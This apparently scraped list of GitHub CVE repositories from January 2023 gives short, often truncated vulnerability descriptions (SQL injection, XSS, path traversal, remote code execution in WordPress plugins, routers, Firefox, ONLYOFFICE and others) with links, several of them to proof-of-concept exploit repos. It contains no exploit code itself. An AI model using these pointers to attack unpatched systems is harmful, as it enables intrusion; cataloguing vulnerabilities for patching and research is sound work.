**In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14322](https://github.com/Live-Hack-CVE/CVE-2019-14322) create time: 2023-01-31T22:08:08Z

**An issue was discovered in rConfig 3.9.3. A remote authenticated user can directly execute system commands by sending a GET request to ajaxArchiveFiles.php because the path parameter is passed to the exec function without filtering, which can lead to command execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19509](https://github.com/Live-Hack-CVE/CVE-2019-19509) create time: 2023-01-31T22:07:53Z

**An issue was discovered in rConfig 3.9.3. The install script updates the /etc/sudoers file for rconfig specific tasks. After an "rConfig specific Apache configuration" update, apache has high privileges for some binaries. This can be exploited by an attacker to bypass local security restrictions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19585](https://github.com/Live-Hack-CVE/CVE-2019-19585) create time: 2023-01-31T22:07:50Z

**A vulnerability was found in dnsmasq before version 2.81, where the memory leak allows remote attackers to cause a denial of service (memory consumption) via vectors involving DHCP response creation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14834](https://github.com/Live-Hack-CVE/CVE-2019-14834) create time: 2023-01-31T22:07:46Z

**repodata_schema2id in repodata.c in libsolv before 0.7.6 has a heap-based buffer over-read via a last schema whose length is less than the length of the input schema. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20387](https://github.com/Live-Hack-CVE/CVE-2019-20387) create time: 2023-01-31T22:07:43Z

**A Symbolic Link (Symlink) Following vulnerability in the packaging of munge in SUSE Linux Enterprise Server 15; openSUSE Factory allowed local attackers to escalate privileges from user munge to root. This issue affects: SUSE Linux Enterprise Server 15 munge versions prior to 0.5.13-4.3.1. openSUSE Factory munge versio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3691](https://github.com/Live-Hack-CVE/CVE-2019-3691) create time: 2023-01-31T22:07:34Z

**Symantec Endpoint Detection and Response (SEDR), prior to 4.3.0, may be susceptible to a cross site scripting (XSS) issue. XSS is a type of issue that can enable attackers to inject client-side scripts into web pages viewed by other users. An XSS vulnerability may be used by attackers to potentially bypass access contr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19547](https://github.com/Live-Hack-CVE/CVE-2019-19547) create time: 2023-01-31T22:07:30Z

**There was a flaw in the WordPress plugin, Email Subscribers & Newsletters before 4.3.1, that allowed SQL statements to be passed to the database in the hash parameter (a blind SQL injection vulnerability). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20361](https://github.com/Live-Hack-CVE/CVE-2019-20361) create time: 2023-01-31T22:07:27Z

**A Local Privilege Escalation issue was discovered in Avast Secure Browser 76.0.1659.101. The vulnerability is due to an insecure ACL set by the AvastBrowserUpdate.exe (which is running as NT AUTHORITY\SYSTEM) when AvastSecureBrowser.exe checks for new updates. When the update check is triggered, the elevated process cl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17190](https://github.com/Live-Hack-CVE/CVE-2019-17190) create time: 2023-01-31T22:07:22Z

**Digi AnywhereUSB 14 allows XSS via a link for the Digi Page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18859](https://github.com/Live-Hack-CVE/CVE-2019-18859) create time: 2023-01-31T22:07:15Z

**Agent A is able to save a draft (i.e. for customer reply). Then Agent B can open the draft, change the text completely and send it in the name of Agent A. For the customer it will not be visible that the message was sent by another agent. This issue affects: ((OTRS)) Community Edition 6.0.x version 6.0.24 and prior ver CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1767](https://github.com/Live-Hack-CVE/CVE-2020-1767) create time: 2023-01-31T22:07:18Z

**The LearnDash LMS plugin before 3.1.2 for WordPress allows XSS via the ld-profile search field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7108](https://github.com/Live-Hack-CVE/CVE-2020-7108) create time: 2023-01-31T22:07:11Z

**async.c and dict.c in libhiredis.a in hiredis through 0.14.0 allow a NULL pointer dereference because malloc return values are unchecked. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7105](https://github.com/Live-Hack-CVE/CVE-2020-7105) create time: 2023-01-31T22:07:07Z

**Proof of concept for CVE-2022-34556** : [Halcy0nic/CVE-2022-34556](https://github.com/Halcy0nic/CVE-2022-34556) create time: 2023-01-31T22:07:50Z

**Vulnerability CVE-2021-44228 allows remote code execution without authentication for several versions of Apache Log4j2 (Log4Shell). Attackers can exploit vulnerable servers by connecting over any protocol, such as HTTPS, and sending a specially crafted string.** : [demining/Log4j-Vulnerability](https://github.com/demining/Log4j-Vulnerability) create time: 2023-01-31T20:29:26Z

**Proof of concept for CVE-2022-36234** : [Halcy0nic/CVE-2022-36234](https://github.com/Halcy0nic/CVE-2022-36234) create time: 2023-01-31T20:59:35Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-6921, CVE-2016-6923, CVE-2016-6925, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4279](https://github.com/Live-Hack-CVE/CVE-2016-4279) create time: 2023-01-31T19:57:53Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6929](https://github.com/Live-Hack-CVE/CVE-2016-6929) create time: 2023-01-31T19:57:49Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6930](https://github.com/Live-Hack-CVE/CVE-2016-6930) create time: 2023-01-31T19:57:46Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6923, CVE-2016-6925, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6921](https://github.com/Live-Hack-CVE/CVE-2016-6921) create time: 2023-01-31T19:57:42Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6932](https://github.com/Live-Hack-CVE/CVE-2016-6932) create time: 2023-01-31T19:57:38Z

**CVE-2021-22005 - VMWare vCenter Server File Upload to RCE** : [CrackerCat/CVE-2021-22006](https://github.com/CrackerCat/CVE-2021-22006) create time: 2021-09-26T01:02:00Z

**An issue was discovered in LIVEBOX Collaboration vDesk before v018. Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorizati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45172](https://github.com/Live-Hack-CVE/CVE-2022-45172) create time: 2023-01-31T19:58:26Z

**i-librarian 4.10 is vulnerable to Arbitrary file upload in ajaxsupplement.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47854](https://github.com/Live-Hack-CVE/CVE-2022-47854) create time: 2023-01-31T19:58:22Z

**COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Cross Site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47701](https://github.com/Live-Hack-CVE/CVE-2022-47701) create time: 2023-01-31T19:58:19Z

**COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Incorrect Access Control. Improper authentication allows requests to be made to back-end scripts without a valid session or authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47700](https://github.com/Live-Hack-CVE/CVE-2022-47700) create time: 2023-01-31T19:58:15Z

**COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Incorrect Access Control. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47699](https://github.com/Live-Hack-CVE/CVE-2022-47699) create time: 2023-01-31T19:58:12Z

**COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Cross Site Scripting (XSS) via the URL filtering feature in the router. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47698](https://github.com/Live-Hack-CVE/CVE-2022-47698) create time: 2023-01-31T19:58:08Z

**COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Account takeover. Anyone can reset the password of the admin accounts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47697](https://github.com/Live-Hack-CVE/CVE-2022-47697) create time: 2023-01-31T19:58:04Z

**The WeStand WordPress theme before 2.1, footysquare WordPress theme, aidreform WordPress theme, statfort WordPress theme, club-theme WordPress theme, kingclub-theme WordPress theme, spikes WordPress theme, spikes-black WordPress theme, soundblast WordPress theme, bolster WordPress theme from ChimpStudio and PixFill doe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0316](https://github.com/Live-Hack-CVE/CVE-2022-0316) create time: 2023-01-31T19:57:57Z

**The Booster for WooCommerce WordPress plugin before 6.0.1, Booster Plus for WooCommerce WordPress plugin before 6.0.1, Booster Elite for WooCommerce WordPress plugin before 6.0.1 have either flawed CSRF checks or are missing them completely in numerous places, allowing attackers to make logged in users perform unwanted CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4017](https://github.com/Live-Hack-CVE/CVE-2022-4017) create time: 2023-01-31T19:57:32Z

**The WP Limit Login Attempts WordPress plugin through 2.6.4 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based restrictions on login forms. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4303](https://github.com/Live-Hack-CVE/CVE-2022-4303) create time: 2023-01-31T19:57:28Z

**A CWE-285: Improper Authorization vulnerability exists that could cause Denial of Service against the Geo SCADA server when specific messages are sent to the server over the database server TCP port. Affected Products: EcoStruxure™ Geo SCADA Expert 2019, EcoStruxure™ Geo SCADA Expert 2020, EcoStruxure™ Geo SCADA Expert CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22610](https://github.com/Live-Hack-CVE/CVE-2023-22610) create time: 2023-01-31T19:58:01Z

**Westbrookadmin portfolioCMS v1.05 allows attackers to bypass password validation and access sensitive information via session fixation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20402](https://github.com/Live-Hack-CVE/CVE-2020-20402) create time: 2023-01-31T17:46:27Z

**Simple POC of the CVE-2021-42574 for solidity and solc compiler** : [tin-z/solidity_CVE-2021-42574-POC](https://github.com/tin-z/solidity_CVE-2021-42574-POC) create time: 2023-01-31T18:15:00Z

**ONLYOFFICE all versions as of 2021-11-08 is affected by Incorrect Access Control. An attacker can authenticate with the web socket service of the ONLYOFFICE document editor which is protected by JWT auth by using a default JWT signing key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43445](https://github.com/Live-Hack-CVE/CVE-2021-43445) create time: 2023-01-31T17:47:33Z

**ONLYOFFICE all versions as of 2021-11-08 is affected by Incorrect Access Control. Signed document download URLs can be forged due to a weak default URL signing key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43444](https://github.com/Live-Hack-CVE/CVE-2021-43444) create time: 2023-01-31T17:47:29Z

**Instructure Canvas LMS didn't properly deny access to locked/unpublished files when the unprivileged user access the DocViewer based file preview URL (canvadoc_session_url). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36539](https://github.com/Live-Hack-CVE/CVE-2021-36539) create time: 2023-01-31T17:47:26Z

**ONLYOFFICE all versions as of 2021-11-08 is vulnerable to Cross Site Scripting (XSS). The "macros" feature of the document editor allows malicious cross site scripting payloads to be used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43446](https://github.com/Live-Hack-CVE/CVE-2021-43446) create time: 2023-01-31T17:47:00Z

**ONLYOFFICE all versions as of 2021-11-08 is affected by Incorrect Access Control. An authentication bypass in the document editor allows attackers to edit documents without authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43447](https://github.com/Live-Hack-CVE/CVE-2021-43447) create time: 2023-01-31T17:46:19Z

**The WordPress Simple Shopping Cart WordPress plugin before 4.6.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4672](https://github.com/Live-Hack-CVE/CVE-2022-4672) create time: 2023-01-31T17:47:22Z

**The Landing Page Builder WordPress plugin before 1.4.9.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4718](https://github.com/Live-Hack-CVE/CVE-2022-4718) create time: 2023-01-31T17:47:18Z

**The WP Popups WordPress plugin before 2.1.4.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4716](https://github.com/Live-Hack-CVE/CVE-2022-4716) create time: 2023-01-31T17:47:14Z

**The FluentAuth WordPress plugin before 1.0.2 prioritizes getting a visitor's IP address from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass the IP-based blocks set by the plugin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4746](https://github.com/Live-Hack-CVE/CVE-2022-4746) create time: 2023-01-31T17:47:11Z

**IdentitylQ 8.3 and all 8.3 patch levels prior to 8.3p2, IdentitylQ 8.2 and all 8.2 patch levels prior to 8.2p5, IdentitylQ 8.1 and all 8.1 patch levels prior to 8.1p7, Identity|Q 8.0 and all 8.0 patch levels prior to 8.0p6 allow access to arbitrary files in the application server filesystem due to a path traversal vuln CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46835](https://github.com/Live-Hack-CVE/CVE-2022-46835) create time: 2023-01-31T17:47:07Z

**IdentityIQ 8.3 and all 8.3 patch levels prior to 8.3p2, IdentityIQ 8.2 and all 8.2 patch levels prior to 8.2p5, IdentityIQ 8.1 and all 8.1 patch levels prior to 8.1p7, IdentityIQ 8.0 and all 8.0 patch levels prior to 8.0p6, and all prior versions allow authenticated users assigned the Identity Administrator capability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45435](https://github.com/Live-Hack-CVE/CVE-2022-45435) create time: 2023-01-31T17:47:04Z

**SQL Injection vulnerability in Bangresto 1.0 via the itemID parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47780](https://github.com/Live-Hack-CVE/CVE-2022-47780) create time: 2023-01-31T17:46:45Z

**Buffer Overflow Vulnerability in D-Link DIR-825 v1.33.0.44ebdd4-embedded and below allows attacker to execute arbitrary code via the GetConfig method to the /CPE endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47035](https://github.com/Live-Hack-CVE/CVE-2022-47035) create time: 2023-01-31T17:46:42Z

**Cross Site Scripting vulnerability in Joplin Desktop App before v2.9.17 allows attacker to execute arbitrary code via improper santization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45598](https://github.com/Live-Hack-CVE/CVE-2022-45598) create time: 2023-01-31T17:46:38Z

**On Windows, Apache Portable Runtime 1.7.0 and earlier may write beyond the end of a stack based buffer in apr_socket_sendv(). This is a result of integer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28331](https://github.com/Live-Hack-CVE/CVE-2022-28331) create time: 2023-01-31T17:46:34Z

**Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR) version 1.7.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24963](https://github.com/Live-Hack-CVE/CVE-2022-24963) create time: 2023-01-31T17:46:30Z

**Integer Overflow or Wraparound vulnerability in apr_base64 functions of Apache Portable Runtime Utility (APR-util) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime Utility (APR-util) 1.6.1 and prior versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25147](https://github.com/Live-Hack-CVE/CVE-2022-25147) create time: 2023-01-31T17:46:23Z

**The Analyticator WordPress plugin before 6.5.6 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3425](https://github.com/Live-Hack-CVE/CVE-2022-3425) create time: 2023-01-31T17:46:15Z

**The Structured Content WordPress plugin before 1.5.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as ad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4715](https://github.com/Live-Hack-CVE/CVE-2022-4715) create time: 2023-01-31T17:46:12Z

**SQL Inection vulnerability in Dromara hutool v5.8.11 allows attacker to execute arbitrary code via the aviator template engine. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24163](https://github.com/Live-Hack-CVE/CVE-2023-24163) create time: 2023-01-31T17:46:53Z

**Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the XmlUtil.readObjectFromXml parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24162](https://github.com/Live-Hack-CVE/CVE-2023-24162) create time: 2023-01-31T17:46:49Z

**Patches CVE-2022-41099** : [g-gill24/WinRE-Patch](https://github.com/g-gill24/WinRE-Patch) create time: 2023-01-31T17:06:13Z

**An issue was discovered in Open Ticket Request System (OTRS) 6.0.x through 6.0.7. A carefully constructed email could be used to inject and execute arbitrary stylesheet or JavaScript code in a logged in customer's browser in the context of the OTRS customer panel application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-11563](https://github.com/Live-Hack-CVE/CVE-2018-11563) create time: 2023-01-31T15:33:15Z

**A vulnerability exists where if a user opens a locally saved HTML file, this file can use file: URIs to access other files in the same directory or sub-directories if the names are known or guessed. The Fetch API can then be used to read the contents of any files stored in these directories and they may uploaded to a s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11730](https://github.com/Live-Hack-CVE/CVE-2019-11730) create time: 2023-01-31T15:33:39Z

**The HTTP Alternative Services header, Alt-Svc, can be used by a malicious site to scan all TCP ports of any host that the accessible to a user when web content is loaded. This vulnerability affects Firefox < 68. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11728](https://github.com/Live-Hack-CVE/CVE-2019-11728) create time: 2023-01-31T15:33:34Z

**Activity Stream can display content from sent from the Snippet Service website. This content is written to innerHTML on the Activity Stream page without sanitization, allowing for a potential access to other information available to the Activity Stream, such as browsing history, if the Snipper Service were compromised. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11718](https://github.com/Live-Hack-CVE/CVE-2019-11718) create time: 2023-01-31T15:33:31Z

**Application permissions give additional remote troubleshooting permission to the site input.mozilla.org, which has been retired and now redirects to another site. This additional permission is unnecessary and is a potential vector for malicious attacks. This vulnerability affects Firefox < 68. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11724](https://github.com/Live-Hack-CVE/CVE-2019-11724) create time: 2023-01-31T15:33:27Z

**A vulnerability exists during the installation of add-ons where the initial fetch ignored the origin attributes of the browsing context. This could leak cookies in private browsing mode or across different "containers" for people who use the Firefox Multi-Account Containers Web Extension. This vulnerability affects Fir CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11723](https://github.com/Live-Hack-CVE/CVE-2019-11723) create time: 2023-01-31T15:33:23Z

**When a user navigates to site marked as unsafe by the Safebrowsing API, warning messages are displayed and navigation is interrupted but resources from the same site loaded through websockets are not blocked, leading to the loading of unsafe resources and bypassing safebrowsing protections. This vulnerability affects F CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11725](https://github.com/Live-Hack-CVE/CVE-2019-11725) create time: 2023-01-31T15:33:19Z

**A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 60.7.1, Firefox < 67.0.3, and Thunderbird < 60.7.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11707](https://github.com/Live-Hack-CVE/CVE-2019-11707) create time: 2023-01-31T15:33:11Z

**A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0920, CVE-2019-1005, CVE-2019-1055, CVE-2019-1080. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-0988](https://github.com/Live-Hack-CVE/CVE-2019-0988) create time: 2023-01-31T15:33:03Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Partition). Supported versions that are affected are 8.0.15 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2587](https://github.com/Live-Hack-CVE/CVE-2019-2587) create time: 2023-01-31T15:32:59Z

**The Top 10 WordPress plugin before 3.2.3 does not validate and escape some of its Block attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4570](https://github.com/Live-Hack-CVE/CVE-2022-4570) create time: 2023-01-31T15:33:42Z

**The Product Slider for WooCommerce WordPress plugin before 2.6.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4629](https://github.com/Live-Hack-CVE/CVE-2022-4629) create time: 2023-01-31T15:33:07Z

**CVE-2018-6574 go get** : [antunesmpedro/CVE-2018-6574](https://github.com/antunesmpedro/CVE-2018-6574) create time: 2023-01-31T15:01:45Z

**A CWE-294: Authentication Bypass by Capture-replay vulnerability exists that could cause execution of unauthorized Modbus functions on the controller when hijacking an authenticated Modbus session. Affected Products: EcoStruxure™ Control Expert (All Versions), EcoStruxure™ Process Expert (Version V2020 & prior), Modico CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45789](https://github.com/Live-Hack-CVE/CVE-2022-45789) create time: 2023-01-31T12:16:56Z

**ChangingTech MegaServiSignAdapter component has a vulnerability of Out-of-bounds Read due to insufficient validation for parameter length. An unauthenticated remote attacker can exploit this vulnerability to access partial sensitive content in memory and disrupts partial services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39061](https://github.com/Live-Hack-CVE/CVE-2022-39061) create time: 2023-01-31T12:16:49Z

**ChangingTech MegaServiSignAdapter component has a vulnerability of improper input validation. An unauthenticated remote attacker can exploit this vulnerability to access and modify HKEY_CURRENT_USER subkey (ex: AutoRUN) in Registry where malicious scripts can be executed to take control of the system or to terminate th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39060](https://github.com/Live-Hack-CVE/CVE-2022-39060) create time: 2023-01-31T12:16:45Z

**ChangingTech MegaServiSignAdapter component has a path traversal vulnerability within its file reading function. An unauthenticated remote attacker can exploit this vulnerability to access arbitrary system files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39059](https://github.com/Live-Hack-CVE/CVE-2022-39059) create time: 2023-01-31T12:16:41Z

**In Apache Linkis <=1.3.0 when used with the MySQL Connector/J, a deserialization vulnerability with possible remote code execution impact exists when an attacker has write access to a database and configures new datasource with a MySQL data source and malicious parameters. Therefore, the parameters in the jdbc url shou CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44645](https://github.com/Live-Hack-CVE/CVE-2022-44645) create time: 2023-01-31T12:16:36Z

**In Apache Linkis <=1.3.0 when used with the MySQL Connector/J, an authenticated attacker could read arbitrary local file by connecting a rogue mysql server, By adding allowLoadLocalInfile to true in the jdbc parameter. Therefore, the parameters in the jdbc url should be blacklisted. Versions of Apache Linkis <= 1.3.0 w CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44644](https://github.com/Live-Hack-CVE/CVE-2022-44644) create time: 2023-01-31T12:16:18Z

**Efence login function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify or delete database. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22900](https://github.com/Live-Hack-CVE/CVE-2023-22900) create time: 2023-01-31T12:16:52Z

**Incorrect Authorization vulnerability in Apache Software Foundation Apache IoTDB.This issue affects the iotdb-web-workbench component from 0.13.0 before 0.13.3. iotdb-web-workbench is an optional component of IoTDB, providing a web console of the database. This problem is fixed from version 0.13.3 of iotdb-web-workbenc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24829](https://github.com/Live-Hack-CVE/CVE-2023-24829) create time: 2023-01-31T12:16:33Z

**A path traversal vulnerability affects yaffshiv YAFFS filesystem extractor. By crafting a malicious YAFFS file, an attacker could force yaffshiv to write outside of the extraction directory. This issue affects yaffshiv up to version 0.1 included, which is the most recent at time of publication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0593](https://github.com/Live-Hack-CVE/CVE-2023-0593) create time: 2023-01-31T12:16:29Z

**A path traversal vulnerability affects jefferson's JFFS2 filesystem extractor. By crafting malicious JFFS2 files, attackers could force jefferson to write outside of the extraction directory.This issue affects jefferson: before 0.4.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0592](https://github.com/Live-Hack-CVE/CVE-2023-0592) create time: 2023-01-31T12:16:26Z

**ubireader_extract_files is vulnerable to path traversal when run against specifically crafted UBIFS files, allowing the attacker to overwrite files outside of the extraction directory (provided the process has write access to that file or directory). This is due to the fact that a node name (dent_node.name) is consider CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0591](https://github.com/Live-Hack-CVE/CVE-2023-0591) create time: 2023-01-31T12:16:22Z

**no description** : [mistymntncop/CVE-2022-26485](https://github.com/mistymntncop/CVE-2022-26485) create time: 2023-01-31T09:01:17Z

**A reliance on cookies without validation/integrity check security vulnerability exists in rack < 2.2.3, rack < 2.1.4 that makes it is possible for an attacker to forge a secure or host-only cookie prefix. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8184](https://github.com/Live-Hack-CVE/CVE-2020-8184) create time: 2023-01-31T06:48:31Z

**A directory traversal vulnerability exists in rack < 2.2.0 that allows an attacker perform directory traversal vulnerability in the Rack::Directory app that is bundled with Rack which could result in information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8161](https://github.com/Live-Hack-CVE/CVE-2020-8161) create time: 2023-01-31T06:48:27Z

**Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24785](https://github.com/Live-Hack-CVE/CVE-2022-24785) create time: 2023-01-31T06:48:24Z

**An issue was discovered in OpenStack Cinder before 19.1.2, 20.x before 20.0.2, and 21.0.0; Glance before 23.0.1, 24.x before 24.1.1, and 25.0.0; and Nova before 24.1.2, 25.x before 25.0.2, and 26.0.0. By supplying a specially created VMDK flat image that references a specific backing file path, an authenticated user ma CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47951](https://github.com/Live-Hack-CVE/CVE-2022-47951) create time: 2023-01-31T06:48:11Z

**A cross-site scripting (XSS) vulnerability in ApolloTheme AP PageBuilder component through 2.4.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the show_number parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44897](https://github.com/Live-Hack-CVE/CVE-2022-44897) create time: 2023-01-31T06:48:07Z

**Improper Authentication vulnerability in Toshiba Storage Security Software V1.2.0.7413 is that allows for sensitive information to be obtained via(local) password authentication module. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30421](https://github.com/Live-Hack-CVE/CVE-2022-30421) create time: 2023-01-31T06:48:03Z

